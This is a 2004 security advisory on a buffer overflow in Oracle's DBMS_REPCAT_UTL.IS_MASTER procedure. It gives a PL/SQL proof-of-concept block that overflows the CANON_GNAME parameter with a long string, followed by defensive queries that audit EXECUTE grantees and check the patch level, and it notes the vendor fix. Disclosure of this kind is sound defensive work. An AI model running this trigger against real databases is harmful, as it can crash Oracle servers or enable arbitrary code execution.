Application Security Inc. - Database Security, Monitoring, Assessment, Auditing, Encryption, and Regulatory Compliance.
Team SHATTER Security Alert

#39 - Buffer overflow in procedure IS_MASTER of DBMS_REPCAT_UTL package

August 31, 2004

Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.

Risk level: Low

Details:
When the IS_MASTER procedure is called with a long string in the CANON_GNAME parameter, a buffer overflow occurs.

To reproduce the overflow, execute the following PL/SQL block:

DECLARE
  RET_VALUE_X123 BOOLEAN;
  P_CANON_GOWNER VARCHAR2(32767);
  P_CANON_GNAME  VARCHAR2(32767);
  P_MASTER       VARCHAR2(32767);
  AAA            VARCHAR2(32767);
BEGIN
  -- Build a 16384-character string by doubling 'A' fourteen times (2^14).
  AAA := 'A';
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  AAA := AAA || AAA;
  P_CANON_GOWNER := '';
  P_CANON_GNAME  := AAA;   -- the oversized CANON_GNAME value triggers the overflow
  P_MASTER       := '';
  RET_VALUE_X123 := SYS.DBMS_REPCAT_UTL.IS_MASTER(CANON_GOWNER => P_CANON_GOWNER,
                                                  CANON_GNAME  => P_CANON_GNAME,
                                                  MASTER       => P_MASTER);
END;
/

Analysis:
This vulnerability can be exploited by members of the SYSDBA role and by users granted EXECUTE permission on the DBMS_REPCAT_UTL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.
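
A pre-patch inventory check, added here as an example and not part of the advisory: it lists every grantee that can reach the package, directly or through a chain of roles, and reports the server release so the 9.2.0.5 patchset status can be confirmed. It assumes a DBA-privileged session; DBA_TAB_PRIVS, DBA_ROLE_PRIVS and V$VERSION are Oracle's standard catalog views.

```sql
-- Added example (not from the advisory): who can call SYS.DBMS_REPCAT_UTL,
-- and which release the server is running. Run from a DBA-privileged session.

-- 1. Direct EXECUTE grants on the package. A PUBLIC row means every
--    database user can reach IS_MASTER.
SELECT grantee, grantor, grantable
  FROM dba_tab_privs
 WHERE owner      = 'SYS'
   AND table_name = 'DBMS_REPCAT_UTL'
   AND privilege  = 'EXECUTE';

-- 2. Users and roles that reach the package indirectly: start from each
--    role holding a direct EXECUTE grant and walk DBA_ROLE_PRIVS down to
--    the users that were granted that role (or a role containing it).
SELECT DISTINCT grantee AS indirect_grantee
  FROM dba_role_privs
 START WITH granted_role IN (SELECT grantee
                               FROM dba_tab_privs
                              WHERE owner      = 'SYS'
                                AND table_name = 'DBMS_REPCAT_UTL'
                                AND privilege  = 'EXECUTE')
CONNECT BY PRIOR grantee = granted_role;

-- 3. Server release: 9.2.0.5.0 or later (Patchset 4) carries the fix;
--    10g is reported as not vulnerable.
SELECT banner
  FROM v$version
 WHERE banner LIKE 'Oracle%';
```

Any grantee returned by the first two queries that has no replication duty is a candidate for a REVOKE until the patchset is applied.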

Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). Oracle 10g is not vulnerable.